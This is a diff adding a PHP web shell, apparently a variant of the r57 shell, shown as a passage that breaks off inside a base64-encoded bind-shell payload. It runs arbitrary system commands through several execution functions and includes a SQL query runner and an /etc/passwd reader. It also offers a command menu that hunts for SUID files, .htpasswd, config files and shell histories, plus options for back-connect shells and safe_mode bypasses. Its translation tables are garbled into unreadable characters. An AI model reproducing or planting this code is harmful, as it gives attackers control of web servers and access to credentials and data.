+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'����� ������',
+'eng_text2' =>'����� ������� �� �������',
+'eng_text3' =>'��� �������',
+'eng_text4' =>'���� ���� ���� ��� �������',
+'eng_text5' =>'��� ��� ��� �������',
+'eng_text6' =>'���� ����',
+'eng_text7' =>'����� �����',
+'eng_text8' =>'���� �����',
+'eng_butt1' =>'�����',
+'eng_butt2' =>'����',
+'eng_text9' =>'��� ���� �� ������� ��� /bin/bash',
+'eng_text10'=>'�����',
+'eng_text11'=>'������ ������',
+'eng_butt3' =>'���',
+'eng_text12'=>'������ �����',
+'eng_text13'=>'���� ��',
+'eng_text14'=>'������',
+'eng_butt4' =>'������',
+'eng_text15'=>'��� ����� ��� �������',
+'eng_text16'=>'�� ����',
+'eng_text17'=>'���� �����',
+'eng_text18'=>'���� �����',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'������',
+'eng_text21'=>'&nbsp;����� ������',
+'eng_text22'=>'����� ��������',
+'eng_text23'=>'������ ������',
+'eng_text24'=>'������� ������',
+'eng_text25'=>'������ ������',
+'eng_text26'=>'������',
+'eng_butt5' =>'�����',
+'eng_text28'=>'����� �� ����� �����',
+'eng_text29'=>'����� ������',
+'eng_butt6' =>'����',
+'eng_text30'=>'��� ���',
+'eng_butt7' =>'���',
+'eng_text31'=>'����� ��� �����',
+'eng_text32'=>'����� ��� php �� ���� ���� eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'������',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'������� . ������',
+'eng_text37'=>'��� ��������',
+'eng_text38'=>'���� ������',
+'eng_text39'=>'�������',
+'eng_text40'=>'���� �� ����� �������',
+'eng_butt9' =>'����',
+'eng_text41'=>'��� ������ ��',
+'eng_text42'=>'����� �������',
+'eng_text43'=>'����� ������ ������',
+'eng_butt10'=>'���',
+'eng_text44'=>'�������� ������� ��� ��� ����� ��� ����',
+'eng_text45'=>'�� �����',
+'eng_text46'=>'��� phpinfo()',
+'eng_text47'=>'���� ��������� �� php.ini',
+'eng_text48'=>'��� ����� ��� temp',
+'eng_butt11'=>'����� �����',
+'eng_text49'=>'��� ������� �� �������',
+'eng_text50'=>'��� ������� ������� ��������',
+'eng_text51'=>'��� ������� �������',
+'eng_text52'=>'��� ��',
+'eng_text53'=>'�� ������',
+'eng_text54'=>'��� �� �� �� �������',
+'eng_butt12'=>'���',
+'eng_text55'=>'��� �� �������',
+'eng_text56'=>'������ :(',
+'eng_text57'=>'�����/��� ���/����',
+'eng_text58'=>'�����',
+'eng_text59'=>'���',
+'eng_text60'=>'����',
+'eng_butt13'=>'����� /���',
+'eng_text61'=>'�� ����� �����',
+'eng_text62'=>'�� ����� ������',
+'eng_text63'=>'�� ��� �����',
+'eng_text64'=>'�� ��� ������',
+'eng_text65'=>'�����',
+'eng_text66'=>'���',
+'eng_text67'=>'�������/��������/��������',
+'eng_text68'=>'���',
+'eng_text69'=>'��� �����',
+'eng_text70'=>'�������',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'���� ������',
+'eng_text73'=>'��� �� ��������',
+'eng_text74'=>'��� �� �������',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'����� �� �� �� ����� ������ find',
+'eng_text80'=>'�����',
+'eng_text81'=>'���������',
+'eng_text82'=>'����� ��������',
+'eng_text83'=>'����� ��� �������',
+'eng_text84'=>'������� �����',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'����� ����� �� �������',
+'eng_butt14'=>'�����',
+'eng_text87'=>'����� ����� �� ���� ���� �� ��',
+'eng_text88'=>'����� ���� �� ��:������',
+'eng_text89'=>'��� �� ���� �� ��',
+'eng_text90'=>'������� ���',
+'eng_text91'=>'�����',
+'eng_text92'=>'�� ��� �������',
+'eng_text93'=>'���� �� ��',
+'eng_text94'=>'����� ���� �� ��',
+'eng_text95'=>'����� ����������',
+'eng_text96'=>'�� ����� ��� ����� ����������',
+'eng_text97'=>'�� �����: ',
+'eng_text98'=>'�� �����: ',
+'eng_text99'=>'* ������ ����� ���������� �� ��� /etc/passwd ����� ��� ftp',
+'eng_text100'=>'����� ��� ��� ���� ���� �� ��',
+'eng_text101'=>'������ ������� ������ ��������',
+'eng_text102'=>'����� ������',
+'eng_text103'=>'����� ����',
+'eng_text104'=>'����� ��� ��� �������',
+'eng_text105'=>'���',
+'eng_text106'=>'���',
+'eng_text107'=>'�������',
+'eng_butt15'=>'�����',
+'eng_text108'=>'�������',
+'eng_text109'=>'����',
+'eng_text110'=>'���',
+'eng_text111'=>'����� ����� �������� : ������',
+'eng_text112'=>'����� ������� �� ���� ���� ���� mb_send_mail',
+'eng_text113'=>'����� ����� �������� �� ���� via imap_list',
+'eng_text114'=>'����� ������� �� ���� ���� via imap_body',
+'eng_text115'=>'����� ������� �� ���� compress.zlib://',
+'eng_text116'=>'��� ��',
+'eng_text117'=>'���',
+'eng_text118'=>'�� ��� �����',
+'eng_text119'=>'�������� �����',
+'eng_err0'=>'���� ! ������ ������� ��� ��� ����� ',
+'eng_err1'=>'���� ! ��� ���� ��� ����� ��� ����� ',
+'eng_err2'=>'����! ������ ������� ',
+'eng_err3'=>'����! ��� ���� ��� ������� ����� �� ��',
+'eng_err4'=>'���� ! �������� ������ ��� ����� ���� �� ��',
+'eng_err5'=>'���� ! �������� ���� ������ �� ���� �� ��',
+'eng_err6'=>'���� ! �������� ����� �����',
+'eng_err7'=>'������ ����',
+'eng_text200'=>'����� ������� �� ���� ���� copy()',
+'eng_text202'=>'���� ����� ������ ������',
+'eng_text300'=>'����� ������� �� ���� ���� curl()',
+'eng_text302'=>'���� ����� ������ ������',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'����� �� ����� suid'=>'find / -type f -perm -04000 -ls',
+'����� �� ����� suid �� ������ ������'=>'find . -type f -perm -04000 -ls',
+'����� �� ����� suid'=>'find / -type f -perm -02000 -ls',
+'����� �� ����� suid �� ������ ������'=>'find . -type f -perm -02000 -ls',
+'����� �� ����� config.inc.php'=>'find / -type f -name config.inc.php',
+'����� �� ����� config.inc.php �� ������ ������'=>'find . -type f -name config.inc.php',
+'����� �� ����� config* ����� ����������'=>'find / -type f -name "config*"',
+'����� �� ����� config* �� ������ ������'=>'find . -type f -name "config*"',
+'����� �� ������� ������� �������'=>'find / -type f -perm -2 -ls',
+'����� �� ������� ������� ������� �� ������ ������'=>'find . -type f -perm -2 -ls',
+'����� �� �������� ������� �������'=>'find /  -type d -perm -2 -ls',
+'����� �� �������� ������� ������� �� ������ ������'=>'find . -type d -perm -2 -ls',
+'����� �� ����� ������� ����� �������'=>'find / -perm -2 -ls',
+'����� �� ����� ������� �� ������ ������'=>'find . -perm -2 -ls',
+'����� �� ����� service.pwd'=>'find / -type f -name service.pwd',
+'����� �� ����� service.pwd �� ������ ������'=>'find . -type f -name service.pwd',
+'����� �� �� ����� ������� ������� .htpasswd'=>'find / -type f -name .htpasswd',
+'����� �� ���� ����� ������� ������� �� ������ ������'=>'find . -type f -name .htpasswd',
+'����� �� ���� ����� .bash_history'=>'find / -type f -name .bash_history',
+'����� �� ���� ����� .bash_history �� ������ ������'=>'find . -type f -name .bash_history',
+'����� �� ���� ����� .mysql_history'=>'find / -type f -name .mysql_history',
+'����� �� ���� ����� .mysql_history �� ������ ������'=>'find . -type f -name .mysql_history',
+'����� �� ���� ����� .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'����� �� ���� ����� .fetchmailrc �� ������ ������'=>'find . -type f -name .fetchmailrc',
+'��� ����� ����� �� ������'=>'lsattr -va',
+'���� �������� �������� �� �������'=>'netstat -an | grep -i listen',
+'���� ���� �������� �������� �������'=>'cat /etc/fstab',
+'������ ��� ����� ����� ���� ���� �������� ��� �������'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
